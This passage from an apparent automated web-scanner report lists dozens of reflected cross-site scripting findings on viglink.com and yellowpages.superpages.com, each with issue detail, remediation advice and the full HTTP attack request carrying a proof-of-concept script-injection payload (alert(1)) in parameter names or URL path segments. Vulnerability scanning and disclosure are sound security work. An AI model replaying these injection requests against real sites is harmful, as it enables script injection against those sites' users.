HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:29 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=9BD97DCA9D7762F2670DB1E1F03345C6; Path=/ Vary: Accept-Encoding Content-Length: 4676 Connection: Close
1.355. http://www.viglink.com/dashboard [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.viglink.com
Path: /dashboard
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec13"><script>alert(1)</script>17bc629c6f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /dashboard?bec13"><script>alert(1)</script>17bc629c6f0=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:31 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=B4EA305C436F5A237D15DF9B43B22F82; Path=/ Vary: Accept-Encoding Content-Length: 4684 Connection: Close
1.356. http://www.viglink.com/dashboard/weekly [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.viglink.com
Path: /dashboard/weekly
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d590b"><script>alert(1)</script>d38a4550a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /dashboard/weekly?d590b"><script>alert(1)</script>d38a4550a60=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:31 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=FF71C9F4839729CCC7BAD26DCC9B1EAB; Path=/ Vary: Accept-Encoding Content-Length: 4691 Connection: Close
1.357. http://www.viglink.com/tools/coverage [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.viglink.com
Path: /tools/coverage
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d37"><script>alert(1)</script>ddb311f67d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /tools/coverage?17d37"><script>alert(1)</script>ddb311f67d4=1 HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=A053635AA2C3C40DC2C7D3FEC635779B; __utmz=54157999.1292602654.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; vglnk.Agent.p=0a84063c2069b684e1cf5483b66c3522; __utma=54157999.1186515448.1292596715.1292602654.1292728545.3; __utmc=54157999; __utmb=54157999.6.10.1292728545;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Sun, 19 Dec 2010 03:45:23 GMT Expires: -1 Pragma: no-cache Set-Cookie: JSESSIONID=ABA23A8D2158C498C8DD5226C35B92C9; Path=/ Vary: Accept-Encoding Content-Length: 4690 Connection: Close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc632"-alert(1)-"71a12eb36b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofilecc632"-alert(1)-"71a12eb36b9/css/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70fdf"-alert(1)-"1d2656bf970 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css70fdf"-alert(1)-"1d2656bf970/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff00a"-alert(1)-"c09fe80b6a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/busprofile.cssff00a"-alert(1)-"c09fe80b6a2 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 292ea"-alert(1)-"1eaf64826a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile292ea"-alert(1)-"1eaf64826a8/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 426cf"-alert(1)-"34b2cd046d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css426cf"-alert(1)-"34b2cd046d7/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f48"-alert(1)-"285c1ba1173 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/print.css33f48"-alert(1)-"285c1ba1173 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbad2"-alert(1)-"574d8794b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofiledbad2"-alert(1)-"574d8794b28/js/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3955f"-alert(1)-"ab711f99641 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js3955f"-alert(1)-"ab711f99641/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f2c3"-alert(1)-"2160ccae2d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/busprofile.js3f2c3"-alert(1)-"2160ccae2d4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a57f"-alert(1)-"e0ca9e8f165 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile2a57f"-alert(1)-"e0ca9e8f165/js/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f2ff"-alert(1)-"0d54626e5e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js7f2ff"-alert(1)-"0d54626e5e3/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e00"-alert(1)-"5542952a66f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/csiframe.jsc1e00"-alert(1)-"5542952a66f HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abff"-alert(1)-"60dd3ca3f34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile2abff"-alert(1)-"60dd3ca3f34/js/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4f3f"-alert(1)-"1ef96819ac8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsf4f3f"-alert(1)-"1ef96819ac8/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5dac"-alert(1)-"1b354357d3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/hide.jsa5dac"-alert(1)-"1b354357d3e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f2a3"-alert(1)-"0fe92af8fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile5f2a3"-alert(1)-"0fe92af8fd1/js/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba33c"-alert(1)-"2355df486f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsba33c"-alert(1)-"2355df486f6/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d6f8"-alert(1)-"867529c3b88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/photos.js1d6f8"-alert(1)-"867529c3b88 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 130ee"-alert(1)-"95dec6490a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile130ee"-alert(1)-"95dec6490a8/script.more.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0941"-alert(1)-"48f962a9221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/script.more.jse0941"-alert(1)-"48f962a9221 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54d28"-alert(1)-"3d1a28b6a4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common54d28"-alert(1)-"3d1a28b6a4c/css/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecf56"-alert(1)-"f7d763f97d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssecf56"-alert(1)-"f7d763f97d4/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e54ec"-alert(1)-"bac5768a8c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/forms.csse54ec"-alert(1)-"bac5768a8c0 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d82a8"-alert(1)-"cfe7fde9cb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond82a8"-alert(1)-"cfe7fde9cb4/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
